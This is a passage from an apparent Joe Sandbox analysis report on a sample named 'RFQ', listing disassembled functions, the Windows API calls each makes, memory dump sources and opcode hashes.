                                                                            • Instruction Fuzzy Hash: 4631E870A00109DBCB18DF58D4849AAF7AAFF49310B66C6A5E809CBB55D731EDC2DBC0
                                                                            Function 0068686D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00686832: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068683E
                                                                              • Part of subcall function 00686832: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00686850
                                                                              • Part of subcall function 00686832: FreeLibrary.KERNEL32(00000000,?,?,0068687F,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686862
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068689F
                                                                              • Part of subcall function 006867FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686804
                                                                              • Part of subcall function 006867FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00686816
                                                                              • Part of subcall function 006867FB: FreeLibrary.KERNEL32(00000000,?,?,006C488B,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00686829
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressFreeProc
                                                                            • String ID:
                                                                            • API String ID: 2632591731-0
                                                                            • Opcode ID: e465a847645bf24670a2675cd3b76f54af74b1b995cb6a231b9655d03b681837
                                                                            • Instruction ID: c8f4fd587b07fd61eb5d83106caa828ffc493bdbfd77a31d0da9ca148d8bbf45
                                                                            • Opcode Fuzzy Hash: e465a847645bf24670a2675cd3b76f54af74b1b995cb6a231b9655d03b681837
                                                                            • Instruction Fuzzy Hash: 08112372600205AACB24FB64C812FAD77A39F54710F20852EF586A71C1EEB59A069BA4
                                                                            Function 006B83A2 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: __wsopen_s
                                                                            • String ID:
                                                                            • API String ID: 3347428461-0
                                                                            • Opcode ID: 36157c45ac9ee546d023c11a1b124e21131d1578e1d067293e4049d0438c66f9
                                                                            • Instruction ID: 6fa3c6d5b3e527cdb29a9cef7c758b9648750a73e67dafd5c5f68a9e8185d132
                                                                            • Opcode Fuzzy Hash: 36157c45ac9ee546d023c11a1b124e21131d1578e1d067293e4049d0438c66f9
                                                                            • Instruction Fuzzy Hash: 2E1118B190420AAFCF05DF98E9459DA7BF9FF48310F104459F808AB312DB31DA21CBA5
                                                                            Function 006AE592 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                                            • Instruction ID: bd2449d1890a15c088be6f843e4f624a354e78471ce0c70b0ebc9aa6650c5a4d
                                                                            • Opcode Fuzzy Hash: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                                            • Instruction Fuzzy Hash: 08F02D729016209AD6713A65DC057DA339B9F43334F100B1DF465932D2EF76DD428F99
                                                                            Function 0068B606 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID:
                                                                            • API String ID: 176396367-0
                                                                            • Opcode ID: 1520eb148b97b0abb7c69cfef39cd0b195f92523b3dad6588f40f814a05f324b
                                                                            • Instruction ID: 88cb4d166a11d0accae9bdae6bdf85638caa6ef1effb4eeb657bd9e9643f0d80
                                                                            • Opcode Fuzzy Hash: 1520eb148b97b0abb7c69cfef39cd0b195f92523b3dad6588f40f814a05f324b
                                                                            • Instruction Fuzzy Hash: E5F028B32007006ED714AF28DC02EA6BB99EF45360F10823EFA19CB1D1EB31E4108BA4
                                                                            Function 006B37B0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: e0f6d5dc7f14c15b1966ea3ad3e6e8be0d114cef73a0a8f95f2a7a4a2a072d4a
                                                                            • Instruction ID: 539c2e42eb59de2be305de468252a443e29e033327438510d5725a52b5e5ee53
                                                                            • Opcode Fuzzy Hash: e0f6d5dc7f14c15b1966ea3ad3e6e8be0d114cef73a0a8f95f2a7a4a2a072d4a
                                                                            • Instruction Fuzzy Hash: 6FE0A9F139033466E6612AAA9C01FDA764BAB827A0F050030AC05D2B90DF65DE8087AD
                                                                            Function 006868DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,00751418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 0068690F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 2dc301cc590c343d1baabaa06540fde1c724c84a8b3f3103f1e3e771a60ea5ed
                                                                            • Instruction ID: 88c9d8bc2ff4a237faf19511ff84ec0851e0a7b85324d7906930a27bb444704d
                                                                            • Opcode Fuzzy Hash: 2dc301cc590c343d1baabaa06540fde1c724c84a8b3f3103f1e3e771a60ea5ed
                                                                            • Instruction Fuzzy Hash: CCF039B1105712CFCB34AF64D494862BBE6AF143253248A7EF1DA82610C772A880DF14
                                                                            Function 006ECC1D Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,006CFA27,00743650,00000002), ref: 006ECC44
                                                                              • Part of subcall function 006ECB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,006ECC37,?,?,?), ref: 006ECB77
                                                                              • Part of subcall function 006ECB55: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,006ECC37,?,?,?,?,006CFA27,00743650,00000002), ref: 006ECB8C
                                                                              • Part of subcall function 006ECB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,006ECC37,?,?,?,?,006CFA27,00743650,00000002), ref: 006ECB98
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$Write
                                                                            • String ID:
                                                                            • API String ID: 3847668363-0
                                                                            • Opcode ID: 321fd2784f19d9e9c532a8d149968060bf9733700c96e70de62102ead7428b0e
                                                                            • Instruction ID: d1f6742d6af708bf5136cfe679100d79dd865d045218947c424374c170824cc1
                                                                            • Opcode Fuzzy Hash: 321fd2784f19d9e9c532a8d149968060bf9733700c96e70de62102ead7428b0e
                                                                            • Instruction Fuzzy Hash: D4E03976400708EFC7229F8AD805C9AB7F9FF80621310852FE95692510D3B1AA45DBA0
                                                                            Function 006847D0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006847EF
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath_wcslen
                                                                            • String ID:
                                                                            • API String ID: 541455249-0
                                                                            • Opcode ID: 7b4eeb88861b33fb8dc10a7d95a52f9b8fb2b81001d8181e7b4ced0f55c1ce79
                                                                            • Instruction ID: 8956c7bc4a7484cb8cb7dd2fe53dbde84c535be94510303fa1dda48fa4ddaf7a
                                                                            • Opcode Fuzzy Hash: 7b4eeb88861b33fb8dc10a7d95a52f9b8fb2b81001d8181e7b4ced0f55c1ce79
                                                                            • Instruction Fuzzy Hash: 0DE0C272A002245BCB21E2D89C06FEA77EEEFC97A0F0441B9FC09D7248DD74ED808694
                                                                            Function 006C033B Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,006C06A5,?,?,00000000,?,006C06A5,00000000,0000000C), ref: 006C0358
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 730a4fa0e8bb5edd60a9a73984fcd8a6d07451c377e51847b712797358c2a543
                                                                            • Instruction ID: fff97c8948527b237504153f30b099448a575bc924084ded6a94f3f4c6d6e4d9
                                                                            • Opcode Fuzzy Hash: 730a4fa0e8bb5edd60a9a73984fcd8a6d07451c377e51847b712797358c2a543
                                                                            • Instruction Fuzzy Hash: 2AD06C3208010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856060C736E821AB94
                                                                            Function 006F7368 Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006870E5: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0068AE0C,?,00008000), ref: 00687113
                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 006F75FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 1214770103-0
                                                                            • Opcode ID: f188aeec109e25671d1f4e53536817965d18030f66cd3f27d640e39a88fef12d
                                                                            • Instruction ID: 6b12e087a9eb0cfb691ceee9981b5d736060bc6e48a02bd2bbab4d4d083ecc47
                                                                            • Opcode Fuzzy Hash: f188aeec109e25671d1f4e53536817965d18030f66cd3f27d640e39a88fef12d
                                                                            • Instruction Fuzzy Hash: 46819F702083059FCB54EF28C491AA9B7E2BF89314F04466DF9955B3A2CB70ED45CB56
                                                                            Function 00687BEE Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(?,?,00000000,006C306C), ref: 00687C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 23af2a42348ba1815eec40b563061a37d7d36ec371159e8723727ce9d65f1bb9
                                                                            • Instruction ID: d93148b77da0d3bfe82d0a8acbf1ee630695889ccea3e349bfdef44bdc894bc4
                                                                            • Opcode Fuzzy Hash: 23af2a42348ba1815eec40b563061a37d7d36ec371159e8723727ce9d65f1bb9
                                                                            • Instruction Fuzzy Hash: 55E09275444B11CEC7325F1AE804852FAF6FFE17613218B2ED0E582660D7B098868B50
                                                                            Function 01717378 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 01717389
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 4e3e2c53f83c46e3539bd8cf22c0cc9cfca94db625df6610fa1e0602d1b56095
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: BCE0E67494010DDFDB00DFB8D54969D7BB4EF04701F1001A1FD01D2281D6309D509A62

                                                                            Non-executed Functions

                                                                            Function 00719468 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0071950C
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071954D
                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00719591
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007195BB
                                                                            • SendMessageW.USER32 ref: 007195E4
                                                                            • GetKeyState.USER32(00000011), ref: 0071967D
                                                                            • GetKeyState.USER32(00000009), ref: 0071968A
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007196A0
                                                                            • GetKeyState.USER32(00000010), ref: 007196AA
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007196DB
                                                                            • SendMessageW.USER32 ref: 00719702
                                                                            • SendMessageW.USER32(?,00001030,?,00717D85), ref: 0071980A
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00719820
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00719833
                                                                            • SetCapture.USER32(?), ref: 0071983C
                                                                            • ClientToScreen.USER32(?,?), ref: 007198A1
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007198AE
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007198C8
                                                                            • ReleaseCapture.USER32 ref: 007198D3
                                                                            • GetCursorPos.USER32(?), ref: 0071990B
                                                                            • ScreenToClient.USER32(?,?), ref: 00719918
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00719972
                                                                            • SendMessageW.USER32 ref: 007199A0
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 007199DD
                                                                            • SendMessageW.USER32 ref: 00719A0C
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00719A2D
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00719A3C
                                                                            • GetCursorPos.USER32(?), ref: 00719A5A
                                                                            • ScreenToClient.USER32(?,?), ref: 00719A67
                                                                            • GetParent.USER32(?), ref: 00719A85
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00719AEC
                                                                            • SendMessageW.USER32 ref: 00719B1D
                                                                            • ClientToScreen.USER32(?,?), ref: 00719B76
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00719BA6
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00719BD0
                                                                            • SendMessageW.USER32 ref: 00719BF3
                                                                            • ClientToScreen.USER32(?,?), ref: 00719C40
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00719C74
                                                                              • Part of subcall function 0069ADC4: GetWindowLongW.USER32(?,000000EB), ref: 0069ADD2
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00719CF7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                            • String ID: @GUI_DRAGID$F$p#u
                                                                            • API String ID: 3429851547-3412459582
                                                                            • Opcode ID: 7827c60cba3b3138ed64af95f510e555d71fcdca931e3594dea839980f24e9b2
                                                                            • Instruction ID: f6e6c86d2cf3c36b11ca963d38a4b4073bddf103b7fea8a48fced9c45c3c708c
                                                                            • Opcode Fuzzy Hash: 7827c60cba3b3138ed64af95f510e555d71fcdca931e3594dea839980f24e9b2
                                                                            • Instruction Fuzzy Hash: 0D42DF70204200AFDB21CF68C854BEABBF6FF48310F148659F695972E1D779E892CB95
                                                                            Function 007147A8 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00714828
                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 0071483D
                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 0071485C
                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00714880
                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00714891
                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 007148B0
                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007148E3
                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00714909
                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00714944
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 0071498B
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007149B3
                                                                            • IsMenu.USER32(?), ref: 007149CC
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00714A27
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00714A55
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00714AC9
                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00714B18
                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00714BB7
                                                                            • wsprintfW.USER32 ref: 00714BE3
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00714BFE
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00714C26
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00714C48
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00714C68
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00714C8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 4054740463-328681919
                                                                            • Opcode ID: 5bfe93b15ee942ff0e3cfae9e306cf13165e005564917626255ac19388782786
                                                                            • Instruction ID: 4d1614ad0eac257d9324c58c23046e82af0e14bc439da61659a99e1fca4891fa
                                                                            • Opcode Fuzzy Hash: 5bfe93b15ee942ff0e3cfae9e306cf13165e005564917626255ac19388782786
                                                                            • Instruction Fuzzy Hash: 0E121E71600214AFEB258F6CCC49FEE7BB9EF85710F108169F516EA2E0DB789981CB54
                                                                            Function 0069EFAD Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131threadkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0069EFB7
